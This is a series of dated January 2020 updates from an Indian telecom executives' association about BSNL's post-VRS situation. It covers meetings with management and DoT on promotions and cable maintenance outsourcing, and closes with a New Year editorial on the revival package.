    We further explained the demand from the field units that maintenance of Primary Cable also should be included in the tender for outsourcing. Among the available TTs, very few have knowledge of cable jointing and they are not sufficient to maintain all the Primary Cables. Others are required for Indoor / MDF / Power Plant maintenance. This facts are explained in the meeting with DIR (CFA) but no favorable decisions come out so far. DIR (HR) assured to bring this important issue to the notice of DIR (CFA) again.

    Promotions in the post VRS scenario and the need for Regular Promotion instead of Lookafter arrangement: We strongly protested against the move for giving Look after arrangement instead of Regular promotion. Almost DGM (T / Fin) positions and AGM / CAO / EE grades will become vacant after the VRS on 01/31/2020 and immediate action is to be taken for promotion, we demanded. Since large numbers of Executives with sufficient experiences are working in higher scales, they can be simply given promotion by designation change, we pointed out. Similarly thousands of JTOs in different wings are already in higher scales and can be given promotion by re-designation. Even DPC is not required. LA arrangement is against the interest of the Executives as they loses the service and future promotional avenues. Management is making LA years together and denying regular promotions. We demanded stopping of this mechanism and provide regular promotions for all the eligible Executives.

    On DGM promotions,SNEA explained the meeting with Secretary, DoT on 01.01.2020 and his positive decision allowing DGM promotions. Even DoT given promotion to Sr DDG (CGM) level on 12/30/2019 for those retiring on 12/31/2019 but BSNL is not taking any action to give promotion to the vacant posts before their retirement. After discussion, DIR (HR) assured to discuss with Secretary / DoT and CMD / BSNL and do the needful for DGM promotions.

    Reversion of 2001 Rect JTOs passed the LDCE -2007: Again discussion held on the matter and Assn explained their eligibility with reference to the SDE RR clause 12, note 5 and the clarifications issued in 2007 regarding their eligibility to appear in the LDCE-2007. Now some of them are reverted on the basis of the clarifications issued in 2012 for the LDCE 2010. The clarifications issued regarding eligibility for appearing in LDCE 2007 and LDCE 2010 are entirely different and that made the issue complicated. The eligibility has to be decided based on the clarifications issued for LDCE 2007, we demanded. Since they already become SDEs, they could not write the subsequent DCE held in 2012 and 2015. Among them also, some SDEs of TN Circle facing reversion while others are served only show cause notice. We demanded to stop the reversion process till the matter is decided based on the facts placed before the management. We suggested to form a Committee to examine the matter. Finally DIR (HR) directed the concerned Officers to bring all the related files the next day itself for taking appropriate decision.

    10-01-2020

    10-01-2020

    10-01-2020

    Meeting with Shri P. K. Purwar, CMD BSNL on 01/10/2020: General Secretaries and AGSs of AIBSNLEA and SNEA met CMD BSNL today and had the discussions on the following issues:

    DGM (T) Promotions:Regarding promotions from DET to DGM (T), we explained about the meeting with Secretary (T) DoT on 01st Jan., and 03rd Jan., 2020 in which Secretary (T) agreed for the promotions for DGM (T) provided it is not creating any Additional Financial Implications. CMD BSNL informed that he had also discussed with Secretary (T) in this regard and trying to do the needful.

    Clearing of pending dues of recoveries from the Salary of the employees: CMD informed that the payment of the GPF recoveries in respect of VRS optees, about Rs. 710 Crore will be released on Monday. Other dues will also be cleared at the earliest.

    Promotions to fill up vacant posts after VRS: Regarding Promotions, CMD is of the opinion that employees should forget promotions for at least one year and work hard for the Revival of BSNL. Also opined that more merit is to be introduced in promotions in future. We explained the ground realities. Almost all DGM posts in Telecom & Finance Wings as well as AGM & CAOs posts will become vacant after 1/31/2020 and it will become difficult to run BSNL thereafter without filling up these vacant posts on an immediate basis. There is stagnation in the Cadres of JTO and SDE and their promotions cannot be delayed. At the time of recruitment of JTOs & JAOs as well as in promotions from JTO to SDE, the competitive examination is available and practically 50% Executives eligible at the time of promotion are from competitive quota only, we explained. CMD BSNL agreed about the shortage in AGM, CAO and DGM posts after post-VRS 2019.

    Farewell to the retiring employees: On recognition of the services of the retirees, we requested to restore the amount of Rs 3001 / - as it is just a token of appreciation of their past services in BSNL and honor for them. CMD informed his inability due to the cash crunch in BSNL. In that case, we suggested some alternative arrangement like recharge coupons equal to that amount. CMD appreciated our suggestion and agreed to look into the alternative instead of Cash Award.

    Allotment of USOF Projects to BSNL on Nomination Basis: We appraised CMD BSNL regarding the allotment of USOF Projects to BSNL on Nomination Basis. CMD BSNL mentioned that we have to do all the Govt. Projects / USOF Projects and our performance during previous years was very good and we have completed the Govt. Projects within the time frame. However, we feel that if it is given on Nomination Basis, it will be good for BSNL otherwise if we compete through tender, it may not be beneficial for BSNL.

    Maintenance of Primary Cables: We further appraised CMD about the difficulties faced by the Executives and various Circles in Post-VRS Scenario in maintaining the Primary Cables since the orders for maintenance of Primary Cable for outsourcing has not been issued by the Corporate Office. CMD BSNL mentioned that due to the developmental works going on in various States, the Primary Cable has to be replaced / maintained frequently by taking the permission from various Local State Govt. Bodies / Highway Authorities for which the Tenderer may not come forward and our maintenance work will be suffered badly.

    Maintenance of MDF:We pleaded with the CMD BSNL that the control of MDF should be within BSNL Staff. CMD BSNL mentioned that our young staff should come forward, grab the important works and take responsibility. CMD further mentioned that due to shortage of staff in post VRS scenario it may not be possible to maintain MDF round the clock by the BSNL Staff. After detail discussion, CMD assure to review the situation after three months.

    08-01-2020

    08-01-2020

    SNEA extends solidarity and moral support to the General Strike by the Central Trade Unions on 08.01.2020 against Privatization of Public Sector and other demands

    07-01-2020

    07-01-2020

    Circle Executive Committee meeting of Assam Circle was held at Guwahati on 01/04/2020. GS and Jt Sec (East) addressed the extended CEC meeting. CHQ leaders recollected the contribution of the senior leaders and the activists taken the VRS. They lead the Association during various struggles for settlement of different demands and their contribution will be remembered for ever. All the dues will be settled by 01/31/2020 and their parting with BSNL will be smooth.

    Ultimately our struggle for years together brought good results for BSNL. Management and Govt tried to suppress our struggle by many means, by pay cuts, charge sheets, show cause notices etc etc but we never compromised. Finally our struggle brought out 4G spectrum free of cost as we demanded, land monetization approved, entire expenditure of VRS borne by the Govt, 8500 Cr bond with sovereign guarantee approved to give financial support etc.

    Our main focus is on revival of BSNL. 4G launching is planned for 01.03.2020. The tariff is increasing which is a good sign for the industry and BSNL. If management is able to implement a good mechanism taking the employees into confidence, Revival is very much possible. Everything depends on the management.

    At Corporate level, BSNL restructuring is going on. In the changed scenario, guidelines are issued for outsourcing of CFA work. However we are afraid that due to the stringent conditions, it may fail in many places and BSNL will be in big trouble in maintaining the services after 02/01/2020, we informed the management. The experienced labors may not be able to participate in the tender. Similar work is going on in other verticals also.

    As we afraid, in HR vertical, the number of posts is coming down drastically by restructuring. VRS thrown various challenges and post reduction and promotion is one among them. The threat of post reduction was there for many years and in anticipation of that, Association worked out a non-post based promotion policy well in advance. Now our entire focus is for its early implementation w.e.f the due date of 07/01/2018.

    Unfortunately, some Executive Assn is still demanding post based promotion from a prospective date (for few vacancies) and helping the management to stop the implementation of the new promotion policy. Management is not giving post based promotion in the name of contempt and restructuring and at the same time not implementing the new policy. All are eligible for promotion from 01.07.18 itself but they are insisting for promotion from a prospective date! The opportunity we got last year for SDE promotion for all the SDE posts spoiled by them by the adamant attitude on contempt petition and the demand for personal appearance of CMD and GM (Pers) in the CAT / Ernakulam.

    The new promotion will benefit all the Executives, ensuring a smooth career progression upto AGM Grade. All the JTOs upto 2014 can become SDEs and all the SDEs upto 2016 can become Sr SDE / Sr AO or AGM / CAO as of now. Past service weightage is provided in the new policy. By that, promotion from SDE / AO to Sr SDE / Sr AO Grade will be in 3 years and SDE / AO to AGM / CAO promotion in 8 years which cannot be dreamed in the changed scenario. After VRS, the number of posts in all the cadres will come down drastically.

    By sustained struggle and continuous persuation, we could settle many issues in the past. In 2018 we could give record number of promotions, never heard in the history of BSNL or DoT. Specific issues of the BSNL direct rect employees like i) EPF contribution without the ceiling, ii) 5% Superannuation benefit etc could settle. We will continue our efforts to settlement of the remaining issues with the support of all.

    06-01-2020

    Circle Executive Committee meeting of Assam Circle was held at Guwahati on 01/04/2020. GS and Jt Sec (East) attended and addressed the meeting. The CEC unanimously co-opted the following Circle Office bearers:

    Circle President: Com Suresh Bora, AGM.

    Circle Secretary: Com Borun Baruah, JTO.

    Treasurer: Com Allauddin Ahmed, AO.

    The cooption become necessary as the earlier OBs opted for VRS 2019. SNEA recognizes their contribution for many years and wish them all the best.

    SNEA CHQ wishes all the success for the newly elected young team.

    03-01-2020

    View Media Reports:

    The state-controlled Bharat Sanchar Nigam Limited (BSNL) continues to be at a receiving end following bureaucratic uncertainties leading to an erosion of potential revenue opportunities on the back of Rs 20,000 crore-strong mega connectivity programs despite the Center's thrust to revive the stressed telco ...

    03-01-2020

    03-01-2020

    Interaction with the Consultant M / s Deloitte:

    BSNL management arranged a meeting with the Consultant M / s Deloitte appointed for giving recommendations on continuity in BSNL services in the posts VRS scenario and the short term measures on 01/02/2020.

    GS, President and both AGSs made a detailed discussion with the consultant for about two hours from 1600 Hrs to 1800 Hrs focussing on all the issues that may crop up in the post VRS scenario. The consultant identified acute shortage in DGM, AGM and TT (TM) cadres that will have impact after the VRS.

    Discussions focussed on the ground realities in field units, how it is going to affect after VRS, immediate measures to be taken to reduce the impact, customer relation in the post VRS scenario, merger of SSA and Circle, drawback of present BA structure, manpower requirement, motivation of staff etc etc.

    02-01-2020

    02-01-2020

    GS, President and AGSs met Secretary / DoT, Member (T) / DoT, Addl Secretary / DoT, CMD, DIR (HR), DIR (Fin), Jt Sec / DoT and other senior Officers of DoT on 01.01.2020, the new year and held brief discussions. Discussions with CMD and DIR (HR) on important issues like restructuring and promotion is fixed for next week due to their busy schedule.

    During meeting with Secretary / DoT we raised the issue of DGM (T) promotion which is stopped due to the reply given by Secretary / DoT in the meeting with the Parliamentary Committee that DGM promotion can be issued only after completion of restructuring (ie. After VRS). We explained that all the eligible DEs are getting promotion and there is no reservation involved in DE to DGM promotion and all the 287 DEs belongs to SC / ST category also getting covered. Among the DEs, more than 500 DEs applied for VRS and will miss the promotion if it is issued after 01/31/2020. We further bring to his notice that on 12/30/2019, even the CGM rank officers retiring on 12/31/2019 are given promotion and allowed to avail the promotion. But in the case of BSNL Executives just reverse happening.

    After discussion Secretary informed that he is agreeable for DGM promotion provided: 1) it is not making any financial implications just before VRS and 2) it does not create any issue in similar cadres. We explained that it does not have any financial implications and all are working in higher scales and will not create any issue in similar cadres as DGM promotion is held up after 2017 due to litigations.

    Then Secretary assured us to discuss with CMD and if the information is correct, he will give permission for DGM promotion.

    01-01-2020

    01-01-2020

    Editorial

    2019: Turbulent period in the history of BSNL. We successfully overcome it with unprecedented Unity and Solidarity

    New Year unfolds new hopes with new challenges

    In 2019, we had gone through turbulent times, never witnessed in the history of BSNL with agitations one after another demanding Revival of BSNL. It was really a do or die battle for the BSNL employees. Each and every committed member of SNEA dedicated the whole one year for the Revival of BSNL as each and every right thinking BSNL Executive was aware of the fact that his future is fully depending upon the future of BSNL. Unfortunately during this crucial period also some section of employees, especially some Executives kept away from the mainstream struggles as if collapse of BSNL is nothing to do with them. They have to realise the mistakes and join the mainstream, otherwise the Executives are to take a call to strengthen the mainstream, leaving those negative forces.

    Yes, we had witnessed Repressive measures unleashed by the management and the Govt against the Associations and Unions to compel them to stop the agitations and struggles, allowing BSNL for its natural death by accepting defeat. But we never relented as we were made out of different stuff, ready for any sacrifice and ready to fight to the end, till we achieve our goal. Yes, it was a do or die battle for all of us which we have to win at any cost.

    Initially, the Government was not at all serious on Revival of BSNL. All the Ministries were opposing the Revival Plan. Govt was waiting for the natural death of BSNL. Finance Ministry was so hostile, opposing any type of Revival package and insisting for the closure of BSNL and MTNL. Struggle, side by side with the successful efforts of BSNL employees to create public and media opinion in favor of BSNL Revival really worked wonders. SNEA was in the forefront of all such activities. The compulsion created by us for political intervention finally worked. Sincere efforts of Hon MoC and his efforts to form the GoM with the Home Minister as its Chairman coupled with the sincere efforts of both Secretaries / DoT and both CMDs / BSNL made things happen. Our efforts for the intervention of Hon Prime Minister and the final call by the Hon Prime Minister himself to give a good Revival package that will really help revival of BSNL was the most decisive factor.

    Finally the BSNL and MTNL revival package was approved by Union Cabinet on 10/23/2019, giving a new lease of life to BSNL and MTNL. The package is having the real potential for the Revival of BSNL. 4G spectrum charges of Rs 14,155 Crores plus 18% GST will be borne by the Govt as demanded by us. From the beginning, AUAB demanded that Govt should allot free 4G spectrums to BSNL. Land monetization for clearing the liabilities and meeting the CAPEX also got the Cabinet approval. Our demand for financial assistance also materialized in the form of long term bond of 10 years for 15,000 Cr for BSNL and MTNL with Government sovereign guarantee. Our concern for merger of MTNL with BSNL, i.e. the huge financial liability, its status as a listed company and complex HR issues, are getting addressed before the merger takes place. The entire liability of about 15,000 Crores for VRS is borne by the Government as we were opposing any additional financial burden on BSNL in the name of VRS. Allotment of 5G spectrum is another favorable decision in the offing.

    Each and every employee of BSNL, especially the Comrades of SNEA can cherish on this marvelous achievement, creating another history in the Trade Union movement. Yes Comrades, we created history by struggling shoulder to shoulder with other employees, for the Revival of the company, setting an example for other sectors. I am very proud and fortunate to be part of such a struggle and lead an Association of committed members by spearheading the struggle in the banner of AUAB, in the most difficult period. These are the memorable moments in life.

    Now, we are at the doorsteps of 2020 with lot of hopes and expectations. We are looking for positivity in BSNL. BSNL revival is the first among them.

    4G launching on pan India basis on the allotted spectrum should not be delayed. The customers are eagerly waiting for that moment. Equally BSNL is answerable to the Govt also after the allotment of free 4G spectrum. Modernization of the network is to be expedited. Operational issues and clearing the outstanding dues to the labors, contractors, vendors, land owners etc are the immediate challenges to make any outsourcing model successful. BSNL has to regain the confidence among them by clearing their dues which will open the road for the future. Realizing the money through sovereign bond and land monetization are two important measures in that direction. Management has to come out of the VRS syndrome and start working on these issues to make it sure that BSNL is continue to provide uninterrupted services after 1/31/2020. Large number of loyal customers are really worried about the massive voluntary retirement and it is our responsibility to regain their confidence in the post VRS scenario. In this regard, management decisions will be very crucial.

    In addition to the above issues, how management is going to motivate the remaining 47% employees to take the entire workload in the post VRS situation, how they are filling up the vacuum created in the field units which is generating revenue etc will have huge impact on the efforts for the revival of BSNL. The shortage of Executives in higher level can be easily met by promotion which can be done within couple of days by the new policy, simply by taking VC.

    No more excuses can be made by DoT / Government and BSNL management in the name of employee cost as more than 50% employees took VRS, exceeding their target. We already warned management that unprofessional and drastic reduction in the Executives strength will have adverse impact on the BSNL revival and good workers are to be retained in BSNL. All depends on how management is utilizing the remaining employees gainfully in the post VRS scenario. A professional approach and quick policy decisions can once again bring BSNL back on track.

    Let us hope that 2020 will bring good news for BSNL and the entire nation.